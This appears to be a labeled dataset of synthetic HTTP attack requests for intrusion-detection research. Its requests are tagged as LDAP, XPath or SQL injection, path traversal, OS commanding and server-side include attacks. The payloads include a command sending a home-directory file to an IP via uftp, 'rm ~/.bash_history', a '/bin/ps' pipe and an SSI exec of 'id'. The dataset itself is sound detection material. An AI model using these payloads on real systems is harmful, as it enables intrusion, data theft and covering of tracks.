Accept-Charset: windows-1250, x-mac-arabic, windows-1250, iso-10646-ucs-2
Accept-Encoding: dqn/aeanme/o/child::node()[position()=093]     or     'mtsre' =  '
Accept-Language: weBmsbp-ircge, Elian5v-o;q=0.9
Cache-Control: only-if-cached
Client-ip: 201.243.131.154
Cookie: nlir9oy1dqXldym=971966192;Ywef=olPnibshAPaw;jbiu=s9de9e/A;kOni4cuaAsndctd=gtEontorflh7xterm;rhsyhatzqne=oHehnaeseinsmdy;qTmTmXlFe-=aE6if
Cookie2: $Version="2"
Date: Thu, 10 Dec 09 06:30:03 GMT
ETag: W/"q6XRizdtNw3X9KQu19"
Expect: sCbae=NsEera;lsae0ast
If-Modified-Since: Thu, 01 Nov 07 05:34:28 UTC
If-Unmodified-Since: Mon, 08 Mar 04 09:02:12 GMT
If-Match: *
If-None-Match: "4nM5VCjVU_VeL3FvHCj"
If-Range: "hPt.QYl8w3FPf.fjjx"
Max-Forwards: 05
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/88TRD/8ce0nitx/itvnthy/aeirhu.jpg
Range: -579124,02412-
Referer: http://www.zpHnf.com/Bn7iobe/eetagi/otusuaaR/dslnnlo/g0rrqneb.jpg
TE: chunked;q=0.8,trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 9.8; ep-el; rv:9.3.5) Gecko/43774189
UA-Pixels: 784x5970
Via: 6.5 164.187.12.106:0737
Transfer-Encoding: nr4ymt
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48345
Start - Id: 37725
class: LdapInjection
PUT /dUZmeVxNA--qUb8OinR/gedm.htm? HTTP/1.1
Content-Length: 221
Content-Language: rHqubI1,Sret5hus,ns
Content-Encoding: deflate
Content-Location: /e2oot/osMetnos/eseoa.swf
Content-MD5: bm5naGRpdWVnbmZDdHN0dw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 09 Apr 07 01:01:44 GMT
Host: 158.86.138.163
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-kr, iso-8859-4
Accept-Encoding: *
Accept-Language: nmaet6-5a;q=0.3, 0E-D, dhhns-rnem, bpQ-htht;q=0.6, er-m
Cache-Control: min-fresh=5093
Cookie2: $Version="6"
Date: Sun, 20 Dec 09 02:43:48 CET
ETag: "EE7jfrHrbXi6UkKv"
Expect: mutpftt=eegdi
If-Modified-Since: Mon, 09 Apr 07 02:48:42 CET
If-Unmodified-Since: Sun, 21 Aug 05 23:16:15 CET
If-Match: "wiSjV@8-3IPCRDpotW"
If-None-Match: *
Max-Forwards: 9501
Pragma: 1rotl=arTU
Authorization: Basic cmJ3b29sOml0c3JldzM=
Referer: http://asThealU.ch/5itnn/snha/t0ystor.pl
TE: trailers,chunked
User-Agent: RLa1ewol5Snext
UA-Pixels: 6282x273
Via: FTP/5.1 137.160.212.178, FTP/2.2 www.a6taei3d.jpg
Transfer-Encoding: hEjcm; MeyrA=8sno
Upgrade: lnd/9.2, toL/2.4
----: ------------------------------------------------

aIBipa6nfu=t:&1sqnr=45753610&So5d8IGnMV=4&ee=02&eeteo8nato=la4uMbmrmSi2hn&ltpr=0&i5sdCaiearseeid=n4Q4-FaknN&cpoue= Qn&4a5sonheeafrxep=tqsdo&j5m=IkNln)( |(ae=*)&bgsound3hM=8i7f;saronsaeh&ll=0&9i@DeUeN=71344

End - Id: 37725
Start - Id: 38868
class: LdapInjection
GET /mztnanxUni/kCO@5Mxc3xi@N5.tiff?hsetetiR=selectsenae&osNFeea=%29%28%7C%28haRtl%3Deqep*%29&taltpmo=ibetweenuvbscriptbydnullaa&it0aouytttnZbbh=9s5nrhvluapni8el0d HTTP/1.0
Host: 246.28.160.215
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: ndyqIA='aa2Wfinh'
Client-ip: 214.111.130.134
Cookie: seghy2uc=pi8ds;XFzOIOuK=0117928;TegD8eval=&w>elocation3=l rsg089ngt-;7h_insertEVhKH9=cmd6eo;wtrsWilyyrshl6=spm8gnztqntpee8N
Cookie2: $Version="90"
Date: Sun, 02 Dec 07 17:21:15 UTC
ETag: "PbMQvsd@O9GSQt4NCI2"
Expect: f7mneei=HInyhiqd
From: tdusret@b5koNnc.biz
If-Modified-Since: Fri, 06 Feb 09 23:41:50 CET
If-Unmodified-Since: Tue, 30 Jun 09 05:50:22 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Sep 08 21:39:35 UTC
Max-Forwards: 9
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: Basic cnRhY29nRDppNGRkaHJt
Range: -1768,7868-928309
Referer: /htalu/qtit.jpg
TE: chunked;q=0.3
Trailer: Via
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 7.4; te-ot; rv:6.3.5) Gecko/05775604
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 7.3 192.84.30.197, HTTP/6.9 45.45.104.166
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 208 www.eiujur.shtml "niihn9Buntieeetne0nn" "Tue, 17 Oct 06 02:46:38 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38868
Start - Id: 36226
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 147.232.197.106:971
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 58.131.95.224
Cookie: lmk=14323658;9vEaruSX9s=sVh;X4djkYd=ma;4enlcberds=wSN6AsmXMGN;yeareaeTe=dgobject4;6EhauscAidfowh1=s
Cookie2: $Version="298"
Date: Fri, 09 Jul 04 12:22:58 UTC
ETag: W/"02fTRqFrC56Driy1u8a"
Expect: 100-continue
From: maal4k@enPaImpyhd.st
If-Modified-Since: Thu, 06 Nov 08 13:40:13 UTC
If-Unmodified-Since: Fri, 18 Nov 05 21:33:03 CET
If-Match: "KF@Qh6Npq.Dbhdld7V"
If-None-Match: *
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 5
MIME-Version: 3.8
Pragma: sDooBra=gs
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM dHNib2FvOHNiYTlmcnVzdHBzOTBsZHRjZ3J3bmF0ZmhtYWE=
Range: 183-
Referer: http://nrltar.org/5aqemy/yp5eeh/ifi9o/tmet.zip
TE: deflate,chunked;q=0.3
Trailer: Accept-Language
User-Agent: ueQ2I0WAZ http://www.tohy.it
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Windows NT
Via: FTP/0.7 www.ebnW.jpg, FTP/4.2 www.l7lb.css
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36226
Start - Id: 37639
class: LdapInjection
PUT /e7d8SYHBmxbBo/cVM4cMrNE3Y3/ab9OP4Wa.css? HTTP/1.0
Content-Length: 99
Content-Language: 0,5,cosd
Content-Encoding: identity
Content-Location: /ta6o/id5ecwis/1a95h/ensnjos.php3
Content-MD5: dmdocmVpY2VvdWJuOHVlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Nov 04 13:53:15 GMT
Last-Modified: Fri, 05 Nov 04 01:09:13 GMT
Host: www.gcuts.ch
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.6, deflate, identity;q=0.0, deflate;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 76.236.29.239
Cookie: J0noyNOP=intcataisock_streamefHd;tajiae0e=a336ehuw0i;hQLBShSWjfromV=ec8
Cookie2: $Version="477"
Date: Thu, 27 Oct 05 24:41:56 CET
ETag: "oj5Qe7MEf.fDr8DX"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Tue, 30 Jan 07 21:34:52 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: *
If-None-Match: "POOgnptlEENvRjltB"
If-Range: Sat, 21 Feb 09 12:41:48 CET
Max-Forwards: 85
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest algorithm=mRsj
Range: 7-75,773-,28-851
Referer: http://www.dPien.biz/iu1ini/drerp/oeOe/9ehny/iDeqaaD.wav
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: d41nen/9.0.9.9
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: gda/5.8 249.207.108.174, 2.6 152.126.196.113, rwscO/4.8 169.132.87.134
Transfer-Encoding: deflate
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 128.30.229.67
X-Serial-Number: 890650544330146
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

es6eoadc=c.FuJ5W0@F7Y&n5Neesvd0=andivdraraoU&sce=)  (|(rej7=vfuns*)&oarmieeAOdpp=aodo

End - Id: 37639
Start - Id: 35871
class: XPathInjection
GET /oxhNS8PE9_kRc/aN.jpeg?oNxyaht9rnEsE=nO3ya0eA&qt71=%3Cd&CFprocessing-instructioncwJ=4+or++++1%3C+++nvenNt%2Frcyo%2Fey%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D77%5D+++or+++++160%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&eovlEe=ylehncHriifhdifsb&leeAahbdah=r3h&Waoyhl=133809266&X@jt=t&ba4oc=7822&ytiibCx=qJof37-&or0TincKlLi=w%3EOe&fcnel1dr6otio=yB6gLH&9a1e99avlfTrnf=7503340&D02WszOPAAy=eYfDq&tnueieaoi=083&arasoCBnmEnNhse=w.uoKx1A HTTP/1.0
Host: 135.171.176.17:80
Connection: a6se
Accept: image/jpeg;q=0.2, video/*;q=0.2, audio/*
Accept-Charset: hz-gb-2312, utf-8
Accept-Encoding: compress;q=0.6, identity, gzip, gzip;q=0.4, deflate;q=0.2
Accept-Language: ssioi-cmHan, Z-ern, mi-qosme4ef;q=0.7, ni7pu-0, ae9cin-aoutr
Cache-Control: only-if-cached
Client-ip: 179.126.52.145
Cookie: hrrfizdso=thshutdownze rSsm;aie5=6etnie;f6cnNeatlSt=4337;iroErrn9Lem=httpt;xsfEn4leh=i509_FaN44H
Date: Mon, 03 Mar 08 23:59:58 UTC
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: Fpheel@eire9igs.org
If-Modified-Since: Sat, 08 Nov 08 10:41:54 UTC
If-Unmodified-Since: Sat, 03 Mar 07 02:13:37 UTC
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: *
If-Range: "GKMtBkH6qAVl4jR51"
Max-Forwards: 8
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: dcxnx vuow=u1e0
Range: 440415-33194,1644-5
Referer: /sigk/shelOsp/Qne7tot/tsualrJt/aoootaI.rar
Trailer: Expect
User-Agent: gWHjTYhfP0 http://www.oaot.org
Via: 3.2 20.147.36.45, osrg/8.2 www.ts3eei58.html
Transfer-Encoding: AEnWe; ysiITcwr=esret
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 341 www.ei3igla.htm:804 "dheeeoo9Tztn" 
X-Serial-Number: 160475

null

End - Id: 35871
Start - Id: 41489
class: SqlInjection
POST /hoe3ic9/ier/iRldfI/ngP.1H_4EW/3l9eaawoce/aeepE/eootsgt3nt/aTOyAtc/h.SD2yBJOD4e/SrecmeFte/rbm2hSogMlnnb9Ec.gif? HTTP/1.0
Content-Length: 156
Content-Language: 8rq
Content-Encoding: deflate
Content-Location: http://www.erinh6y.st/40weszw/8sDlrs/sihRacoc/irrMsnR.php4
Content-MD5: dGFsbmlhb3phdDVldHJoZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 14:48:02 GMT
Last-Modified: Sat, 14 Mar 09 21:15:08 GMT
Host: www.eeuf.st
Connection: close
Accept: audio/basic;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hffq-e, aohkh-iH;q=0.8
Cache-Control: no-store
Client-ip: 40.1.50.64
Cookie: gotDilo=ea'+Mi+i;g1teserDmPE7t=16330632
Cookie2: $Version="6"
Date: Sun, 03 Oct 04 23:14:52 CET
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: rty1n7=s0jaueru
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Sat, 08 Mar 08 14:51:08 CET
If-Unmodified-Since: Sat, 22 Nov 08 12:41:19 GMT
If-Match: "zWBif8-xvOvO1b6"
If-None-Match: *
If-Range: Wed, 03 Jan 07 05:57:22 GMT
Max-Forwards: 4856
MIME-Version: 4.3
Pragma: hE='o1ds'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: http://www.9ARht0E.it/ktiisbat.pl
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: ta01/7.5.3.9
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 6.0 186.5.57.15
Transfer-Encoding: deflate
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 578 www.rtmebje.jpeg "zolicgs8a3omDgpc" 
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rxeGuuhat4i=OR   'ie' BETWEEN    'R'    AND    'T'&eumiilmws=fg&oibleThinihnsi=o0lbnoo&gdSifnlso=454&ibertermmhr=i&&GZfoYu0boot.ini9r=vbphrrp.

End - Id: 41489
Start - Id: 36824
class: OsCommanding
GET /tMwo4LUf/ncGbJAuQNPNor/mrnRGckUqDgbgsoundSql/snt/ttIE/7sSefk9k0Tuytjt/mNWJbt4/proicf52aeptdoh/w6LS6SvRMVTznJhq.EX/xrEe.pl?Cu.R7G9YQ=119&ece2ih=%27%3Buftp+-g+++%2Fhome%2Flangnasi%2Ftidens++++0.230.13.158++++%2Fsend+++++%3B&l0umtdrIg36mi=%7Eit&ksrohp=sIJGM0okx&ntDenOail=bCVWouW1PB&Srt=ynri&RinLddao=is&caenh=niogitlwvi+t&4Snle7t=85083&ysE8vse=fubeidaiieE&pimste=325 HTTP/1.0
Host: www.oelnduict.cz
Connection: nnIoe
Accept: application/*, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, identity, deflate
Accept-Language: o1d-hl, E-nuarlutb, k-e;q=0.6, edkkHql-epdinr4
Cache-Control: max-stale=79
Client-ip: 108.91.8.21
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="33"
Date: Tue, 07 Jun 05 13:26:54 CET
ETag: W/"bxR1QgfsUgshIYR6I"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Wed, 21 Nov 07 01:07:25 GMT
If-Unmodified-Since: Sat, 11 Aug 07 21:01:20 GMT
If-Match: "GwWeouVuOkSAbnVv"
If-None-Match: "c127AKVKxWVN5FYv9r3P"
If-Range: Sat, 01 Jul 06 12:10:19 CET
Max-Forwards: 7
MIME-Version: 1.9
Pragma: me8t=dOx
Proxy-Authorization: iaejf6 xN9h=Rnvltnn
Authorization: NTLM bFNsaGxsdXNxNG11SGYwMHNtM2xlaHNnZXVpcm5kb2VwbnptZE0=
Range: -95
Referer: /Srr2.mdb
TE: chunked
Trailer: Via
User-Agent: hdo9firtieui
UA-CPU: 68000
UA-Disp: 603,438,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.6 www.pthaf.png
Transfer-Encoding: identity
Upgrade: ehioe/8.2, aew/1.1, i8tRt/4.5, Ox2yni/4.8, 3seho/8.1
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
X-Serial-Number: 076281973736224985
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36824
Start - Id: 37118
class: LdapInjection
GET /nb/c7/oaO71ERp0V3do4wTjD/sl.j/s5o.tLa/tO/MySUhddvhRwavidgani/oL.php4?isaiIe=qaGo.3F4MB&eGMgTFechoEUw=8978841124&vf_cy10=715892395&nomae=aeaHafyo99e&shutdownkDexec=vo%29%28+%7C%281tho%3D*%29&m1a=1921998&9przTh=geh&La9nSHrnkOnEt7g=+%3Fs+i&bt=mvt6 HTTP/1.0
Host: 26.41.53.12
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=2
Client-ip: 116.227.6.28
Cookie: Ya8ilnt9izeveta=ex-deT1;heT=2709;oiio8soeianEnw=oa&8ao
Cookie2: $Version="74"
Date: Fri, 28 Sep 07 05:22:44 CET
ETag: W/"1hm2z.hSMJ2UX6BV@"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Fri, 23 Oct 09 07:35:45 CET
If-Unmodified-Since: Tue, 17 Aug 04 03:13:44 GMT
If-Match: "ERNyZeAE62yHcTnzMakT"
If-None-Match: *
If-Range: "bthC@e0eZ2O04DKXg"
Max-Forwards: 0617
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest cnonce="cvdipt"
Range: -12929,-403
Referer: /ur9feeAe.pdf
TE: trailers
Trailer: Accept-Language
User-Agent: vlwd9NF7@w http://www.hoab.be
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/5.1 www.ydbno6Sg.css, 1.6 20.94.179.45, 8.9 53.204.116.100
Transfer-Encoding: deflate
Upgrade: tRvc9/2.0
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37118
Start - Id: 43285
class: OsCommanding
GET /ocK3ZMcZwB/sLVjapW/ZMVTNZ5formNnWQR-/horoO3fao7af3ae/tyHQYc7IjM5.-c@NjEiJ/sB9x/3kAY6uG3GSaw92sWi5/slwssoecs.html?oinwHwk=%29yrresr%3Ameta&qUqdocumentPIiwC=akarotest%3FoLelo&rxjsA6httpsJqMD=AHlNAmepfn&sooiye8Oteeyjol=991020&E8md6nken=eYGRiVXiwJce&cs8orhr0aucof=e+Edelrbinf%2FjbOE&ooz8o=784381452&dtiea5e=i&CihttpsQXI5F3boot.ini=%2Fbin%2Fps%2500++++%7C&de7egtr=rledRet&qIiI=4534489906 HTTP/1.1
Host: 121.44.174.3
Connection: close
Accept: audio/*, application/*;q=0.5, image/gif;q=0.1
Accept-Charset: cp-932;q=0.4
Accept-Encoding: compress;q=0.3, deflate, gzip;q=0.0
Accept-Language: 3l8get-tcb5teed;q=0.0
Cache-Control: no-store
Client-ip: 86.210.157.25
Cookie: adstaij5ov=2122835;r5tEeuxphq2=7;49rmelat=11742413
Cookie2: $Version="1"
Date: Thu, 11 Mar 10 21:23:23 GMT
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 15 Jun 08 02:35:55 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 552
MIME-Version: 3.7
Pragma: a=4h
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: http://www.QnNjwtt.ch/rdox5eyk/Srasebtu/wieswdaz.dll
TE: chunked
Trailer: If-Match
User-Agent: hedaATtrer/8.1.0
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/0.2 101.232.26.216
Transfer-Encoding: identity
Upgrade: uilasL/5.5, ihdnH/4.2
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 75919
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43285
Start - Id: 42979
class: OsCommanding
GET /I6bodyeif_nU-saminf/I3mdmbe/esn/RtJ/rasmati/hNzqDe0t8kBYxNU/servicesIX7oy/to-nK@div.xin/gvA8jboBw3fa/s@q6xftxBJ9MLEpvhSA..php4? HTTP/1.1
Host: www.cndpr.net:4451
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 153.86.1.36
Cookie: mQt8EN4Diframed='   ;    rm  ~/.bash_history   ;;7dseccccskhv=2ap6quoetienut;pV9w.=?(ceenzrtnrestyleeas;ik7oTtoyas=fyw;7nyjdkleneyew8e=o3HOlrM;tnt=cshutdownpperlbody
Date: Mon, 29 Oct 07 23:44:06 UTC
ETag: "BRdzvI5ukQEU4nue"
Expect: zt5ILc=atutud66
If-Modified-Since: Tue, 01 Jul 08 02:08:51 GMT
If-Unmodified-Since: Mon, 07 Apr 08 04:46:54 GMT
If-Match: "pFdyQVsYGrbAScIdmW"
If-None-Match: "3YrwDiu5nx5wtM54u"
If-Range: *
Max-Forwards: 0522
MIME-Version: 9.3
Pragma: ssf9E8o=E0ouwy0j
Proxy-Authorization: Digest qop=mqEed2
Authorization: Basic c3F0b3NlOnRvaG9yaHJx
Range: 374-7301,3-02,-08660
Referer: http://www.wt4dcht.ch/eetey/drmrAiu/8lox/t5oHiaa.asmx
TE: chunked;q=0.4
Trailer: Connection
User-Agent: 6Oo.G5nft5 http://www.maear3.gov
UA-OS: Linux
UA-Pixels: 040x738
Via: 6.4 73.208.74.174
Transfer-Encoding: deflate
Upgrade: 0totne/4.6, i8fim/2.3, slry/3.2, nesy/2.6, e6ihtO/8.2
Warning: 500 49.223.255.146 "Broidihhls" 
X-Forwarded-For: 201.27.150.146
X-Serial-Number: 746121952999
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42979
Start - Id: 44696
class: PathTransversal
POST /iW60lK9epVw/duih27rai0naL/pwz@Cs/ee2xE.js? HTTP/1.0
Content-Length: 268
Content-Language: uStnvhts,eo
Content-Encoding: deflate
Content-Location: http://www.argtnd.fr/dsbrod/ela6al/ruvlrrt/eip4tos/vTeitsre.jpg
Content-MD5: RWZvZEFUR210YTNkYWt0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Sep 06 06:10:41 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: 120.28.174.8
Connection: close
Accept: image/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: fgs2tnee-6Hbi, drl-sasyhbxa;q=0.6, iee-h;q=0.2
Cache-Control: min-fresh=564
Client-ip: 11.102.132.216
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Wed, 06 May 09 02:53:13 CET
ETag: "RHf0qrb9mHL2t__f2YB"
Expect: 100-continue
From: nC0otao@cuVsd.gov
If-Modified-Since: Mon, 11 Dec 06 07:31:44 UTC
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: "A.DP5b1hpV66gVX"
If-None-Match: "SxwS.Y-e6CXloS1Q"
If-Range: "VL_aKdgyjxkQsD-z"
Max-Forwards: 7
Pragma: hs='tyen'
Authorization: NTLM OW5sczlldGxBaGYzY2luZWJmc3ZmZXRvcnl0bWRlMW9oeWE=
Range: 2168-,8-1607,73-
Referer: http://vehn.ch/1p7nt/hbtrto/ueE8/9Eacwele/tphnei.asp
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: sogxebroyArra
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 136x0173
Via: 8.9 193.116.9.112
Transfer-Encoding: deflate
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 629 183.2.112.153 "z4na" "Sun, 11 Oct 09 15:34:16 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: --------------

iqf3RznWNee6=Ehn&gcteevwite=6522&iw2hejnndsi=o\tesi0ae5l&ummpyRhVnsne=563&keaxek4mieuyd=192&ije4c3=file:///h:/h6pei/e2e/enmrta.xml&tueisyeaaa3ots=w&$euS<dns=@ul&T2LNLPformAiBH=wp-6iSdantd&SlGukbQboot.iniiframegX7=nulliEiboot.inior0ahavingIa

End - Id: 44696
Start - Id: 37697
class: LdapInjection
POST /.lwuUcopye/iXZpKSIqstNoHF4/3Z1G9@qHuw5E/nmoptzw.LDWjpE/alsas/tzrAioG-7yVh/FY30PIEo/hy1where-xr6/c8@wq6D/zSaC@CxnpehAw32hNV/nqNatjPVqGhblYx/SWgZx.ZNz8eik.jpg? HTTP/1.0
Content-Length: 91
Content-Language: nroa,rNNiot,n4b
Content-Encoding: identity
Content-Location: /e0gTzH0/tlmigse/hacpezs.cfm
Content-MD5: SWpzbGU2b2R0aWJhbm9zcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Apr 08 12:53:58 UTC
Last-Modified: Mon, 17 Sep 07 10:12:52 CET
Host: 2.42.131.187
Connection: trwtdA
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, gzip;q=0.0, identity;q=0.1
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 59.157.46.168
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Tue, 08 Apr 08 18:17:31 GMT
ETag: W/"MMz6nJo0JmIGI1uG"
Expect: 100-continue
From: thGyc@rjbnmtcw.gov
If-Modified-Since: Fri, 21 Sep 07 18:37:23 CET
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: "RYR8tqjummLZhkCufZD"
If-None-Match: "KN0zuSR3HZ2YCjNqS3n"
If-Range: "aZK5oU0xpZjJNXu"
Max-Forwards: 9892
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: /eenaamid/lrauws3/oaon.mpg
TE: chunked,gzip;q=0.3,deflate
Trailer: Accept-Language
User-Agent: Mozilla/6.1 (compatible; MSIE 3.3; Win 9x; emittiIu)
UA-CPU: MIPS
UA-Disp: 5884,733,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 940x1719
Via: grh/2.4 www.ss9sch.htm:1
Transfer-Encoding: compress
Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

fa4gehihZCaM=538&yle=oOosohthyvaiDta&sseagadekmbaWga=i38)(&(objectClass  =yeo*)

End - Id: 37697
Start - Id: 40151
class: SSI
GET /ea6WlsEUbFY/0HPmOCv0cNkn/sGjwZSLHZzevX/gO12iwtesevnnf6ec/VB1rcpdiv0aMAbdvarR/pitryPeemsaeOu7O/nw5DyHexecwinntbetweenF2insert6/kzdYap6DsxscutDpEod/eCR68eg05Qka/hcut1RIQZ4CA._-.html?sl9ldussi=%3C%21+++++%23%3C%21--%23exec+cmd%3D%22id%22--%3E&iqths=0611&ttdeimk4lusater=st2qR&YO2AncGaccept=0h0eIr%7Es57troo&eTrsoPAj=0896&qlie0oyts8oasu=yEhnU&ZntcetmnksgiU=rb%3C&1k6.inaxlaeTN=er&hGaescssate=Sdnehyersusotit HTTP/1.1
Host: 104.0.154.137
Connection: keep-alive
Accept: image/png, application/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
